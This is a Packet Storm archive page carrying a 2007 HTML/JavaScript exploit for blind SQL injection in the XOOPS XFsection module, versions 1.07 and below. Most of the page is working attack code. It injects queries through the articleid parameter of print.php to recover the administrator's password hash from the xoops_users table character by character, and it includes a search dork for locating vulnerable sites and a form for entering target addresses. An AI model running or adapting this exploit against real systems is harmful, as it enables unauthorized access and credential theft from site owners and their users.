exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

xoopsxfsec-sql.txt

xoopsxfsec-sql.txt
Posted Apr 3, 2007
Authored by ajann

Xoops module XFsection versions 1.07 and below blind SQL injection exploit.

tags | exploit, sql injection
SHA-256 | e240f4747083cb79053ff292be4b719bf997ac1b286933a149f6001cc03b3044

xoopsxfsec-sql.txt

Change Mirror Download
<html>
<head>
<title>XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit</title>

<script type="text/javascript">

//'===============================================================================================
//'[Script Name: XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit
//'[Coded by : ajann
//'[Author : ajann
//'[Contact : :(
//'[Dork : inurl:/modules/xfsection/
//'[S.Page : http://linux2.ohwada.net/
//'[$$ : Free
//'[Using : Write Target after Submit Click
//'===============================================================================================


function nesneyarat() {

var nesne;
var tarayici = navigator.appName;


if(tarayici == "Microsoft Internet Explorer"){
nesne = new ActiveXObject("Microsoft.XMLHTTP");
}
else {
nesne = new XMLHttpRequest();

}
return nesne;
}

var http = nesneyarat();



function islemlink(adresyolla,charyolla) {

genreidim=document.getElementById('genreid').value
file="/modules/xfsection/print.php?articleid=" + genreidim
pathim=document.getElementById('path').value + file
karakterim=document.getElementById('karakter').value + charyolla
adres=document.getElementById('adresim').value + pathim + adresyolla + karakterim




http.open('get', adres);
http.onreadystatechange = cevapFonksiyonu;
http.send(null);


}



function cevapFonksiyonu() {
if(http.readyState == 4){
document.getElementById('mesaj').value = http.responseText;
yonlendir();

}
}



function yonlendir() {

if (document.getElementById('mesaj').value.indexOf('<span style="font-size: large;">', 0) == -1) {
alert('False');


}

if (document.getElementById('mesaj').value.indexOf('<span style="font-size: large;">', 0) != -1) {
alert('TRUEEEEEEE');
}



}

function dal() {

if (document.getElementById('buton').value == "Test Character(0)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=48)/*');
document.getElementById('buton').value = "Test Character(1)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(1)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=49)/*');
document.getElementById('buton').value = "Test Character(2)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(2)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=50)/*');
document.getElementById('buton').value = "Test Character(3)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(3)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=51)/*');
document.getElementById('buton').value = "Test Character(4)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(4)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=52)/*');
document.getElementById('buton').value = "Test Character(5)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(5)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=53)/*');
document.getElementById('buton').value = "Test Character(6)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(6)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=54)/*');
document.getElementById('buton').value = "Test Character(7)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(7)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=55)/*');
document.getElementById('buton').value = "Test Character(8)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(8)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=56)/*');
document.getElementById('buton').value = "Test Character(9)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(9)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=57)/*');
document.getElementById('buton').value = "Test Character(a)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(a)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=97)/*');
document.getElementById('buton').value = "Test Character(b)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(b)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=98)/*');
document.getElementById('buton').value = "Test Character(c)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(c)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=99)/*');
document.getElementById('buton').value = "Test Character(d)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(d)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=100)/*');
document.getElementById('buton').value = "Test Character(e)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(e)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=101)/*');
document.getElementById('buton').value = "Test Character(f)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(f)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=102)/*');
document.getElementById('buton').value = "Finished"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}



}


</script>

</head>

<body bgcolor="#000000">

<center>

<p><b><font face="Verdana" size="2" color="#008000">XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit</font></b></p>

<p></p>
<b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/</font><font color="#00FF00" size="2" face="Arial">
</font><font color="#FF0000" size="2">&nbsp;</font></b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<input type="text" name="adresim" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="http://"></p>
<br>
<b><font face="Arial" size="1" color="#FF0000">&nbsp;Path:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath]&nbsp;&nbsp;&nbsp; </font></b>
<input type="text" name="path" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="/">
<p>
<b><font face="Arial" size="1" color="#FF0000">&nbsp;Character:</font><font face="Arial" size="1" color="#808080">[Md5
Character 1-32]&nbsp;&nbsp; </font></b>
<input type="text" name="karakter" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1">
</p>
<p>
<b><font face="Arial" size="1" color="#FF0000">Article Id:</font><font face="Arial" size="1" color="#808080">[print.php?articleid=]&nbsp;&nbsp; </font></b>
<input type="text" name="genreid" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1">
</p>
<p><input type="submit" value="Test Character(0)" name="buton" onclick="dal();"></p>
<br>
<textarea name="mesaj" rows="1" cols="20" style="visibility:hidden"></textarea> <br>
<p>

<b><font face="Verdana" size="2" color="#008000">ajann</font></b></p>
</p>
</center>


</body>
</html>


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close